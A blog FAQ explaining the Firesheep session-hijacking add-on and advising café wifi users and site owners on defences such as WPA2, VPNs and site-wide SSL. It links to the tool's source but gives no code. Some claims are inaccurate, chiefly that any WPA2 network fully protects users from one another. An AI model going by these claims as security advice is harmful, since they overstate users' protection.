What it does
Firesheep makes it trivial for any Firefox user ( Windows or Mac, Linux coming soon ) to do a "Sidejacking" attack on the browser session of anyone on the same non-protected* wifi network that the attacker is on. For example, Facebook is one of the sites that is vulnerable ( and by far the biggest name in terms of actual usage ). So, if you're at a coffee shop and someone has Firesheep installed, and you log into Facebook on your laptop, they get a notification on their laptop that you've just logged in, with your profile picture. They click on it and !Bingo! they can instantly do whatever they want, as you, to your Facebook account. That's it in a nutshell.
The developer's post on it is here: http://codebutler.com/firesheep
What sites are vulnerable?
The current list is here: http://github.com/codebutler/firesheep/tree/master/xpi/handlers/
The only notable exception is Google. Google has secured themselves from this vulnerability by locking up their services with SSL. More on this in a second.
What do you mean by that "*" in the first part?
It's easier actually to define what I don't mean. WPA2 ( The "2" is important ) wifi networks are NOT vulnerable. WPA, WEP, WEP2, and open networks ( and whatever other kind you might have that doesn't use WPA2 ) ARE vulnerable. Basically the entire point of WPA2 is to protect clients from other clients.
So, for example, there are 3 coffeehouses within a 3 minute drive of my house. One has a WPA2 network. The other two don't. Guess where I'm getting a Latte?
So, as a user, if you're WPA2, good to go.
What if I'm not on a WPA2 network?
Well, then you need to be careful. What do I mean by "careful"? Use Firefox with the SSL Anywhere Addon. Or a Tor network. Or if you have the means, VPN. More about some options here: http://news.cnet.com/8301-27080_3-20008217-245.html
Is this a lot of technical mumbo jumbo? Yes. Do you want a 15-yr-old hoodlum posting bestiality pictures on your profile the next time you want to surf over a mocha? Probably not.
At the end of the day, though, these are all just throwing a carpet patch over a wine stain in terms of the real behind-the-scenes problem. The only way to actually eliminate the risk is to secure all of a site's traffic with SSL encryption. Up till now the industry standard for when this was necessary was "If e-commerce is involved". That may be a thing of the past. More for site owners farther down the page.
Is someone doing "something™" about it?
Well. Perhaps. As I said, Google already did. I don't run Facebook. Maybe you could email Mark Zucherberg? I hear he's pretty busy these days. Basically we all just have to wait & see.
SSL is in truth not all that expensive. And if enough users make enough noise, yes "they" probably will do "something" about it.
I have a website. Can people use this to break into it?
Many of our client sites have Administrative panels to manage their site's content. If you take the same kind of precautions as you would for Facebook, you'll be fine regardless. However, the real question is - are you on the list of sites I linked above? No? You're not the next Google? Ok you're probably pretty much fine as far as Firesheep is concerned. Basics like making sure you have a strong password, using SSL Anywhere, regularly updating your Windows Anti-Virus software and running scans, etc. will probably keep you pretty secure in terms of your own website.
So what REALLY "fixes" it on my web site?
As mentioned before, it really is up to the site owner and administrator to provide the real fix for it. That fix is: *trumpets* S S L.
SSL ( Secure Socket Layers ) changes the address of your website from http://mysite to: https://mysite. It also encrypts all traffic between your site and the end user so that no one in the middle ( ex: Firesheep users at the coffee shop ) can decipher the conversation.
Honestly, SSL is peace of mind, and it's fairly inexpensive peace of mind. You'll spend less on it than you do on a couple months of car insurance. We can recommend that you do this, but it's really up to you.
No comments:
Post a Comment